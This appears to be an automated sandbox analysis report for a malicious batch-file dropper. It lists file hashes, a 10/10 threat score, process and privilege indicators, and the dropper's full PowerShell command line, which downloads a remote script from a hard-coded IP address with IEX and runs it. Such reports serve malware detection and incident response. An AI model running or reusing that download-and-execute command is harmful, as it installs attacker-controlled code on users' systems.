c21697f0b7e8c644cf9bc515972a1ec3b8c3c357c123dd8b06c1fa1f93e6b88b

Analysis

Target

ba14ab3ed6e7b7ab08b7add2a00958b9.bat
Size

216B
MD5

be80d5e6a14a15ec34832dbba9abf139
SHA1

3f56abfb2adcb556bdabeac9b92de7520a81ccbf
SHA256

c21697f0b7e8c644cf9bc515972a1ec3b8c3c357c123dd8b06c1fa1f93e6b88b
SHA512

20f8041a4f2f000a47bb0f9fb7c4af1b8f4842c6706252ccc4abda665be8f7ae22b1a6d8385a19bc1d0f1e006ffb667334d127cbd70bf66a58e146b039dcd73d

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3060 wrote to memory of 3888	3060	cmd.exe	powershell.exe
PID 3060 wrote to memory of 3888	3060	cmd.exe	powershell.exe
PID 3060 wrote to memory of 3888	3060	cmd.exe	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3792 3888 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 3792 WerFault.exe
Token: SeBackupPrivilege 3792 WerFault.exe
Token: SeDebugPrivilege 3792 WerFault.exe

pid	pid_target	process	target process
3792	3888	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ba14ab3ed6e7b7ab08b7add2a00958b9.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9');Invoke-PYHZVCNXW;Start-Sleep -s 10000"
2⤵
PID:3888

memory/3792-1-0x0000000004960000-0x0000000004961000-memory.dmp

Filesize
4KB

Download
memory/3792-8-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/3888-0-0x0000000000000000-mapping.dmp

Download
memory/3888-2-0x0000000000000000-mapping.dmp

Download
memory/3888-3-0x0000000000000000-mapping.dmp

Download
memory/3888-4-0x0000000000000000-mapping.dmp

Download
memory/3888-5-0x0000000000000000-mapping.dmp

Download
memory/3888-6-0x0000000000000000-mapping.dmp

Download
memory/3888-7-0x0000000000000000-mapping.dmp

Download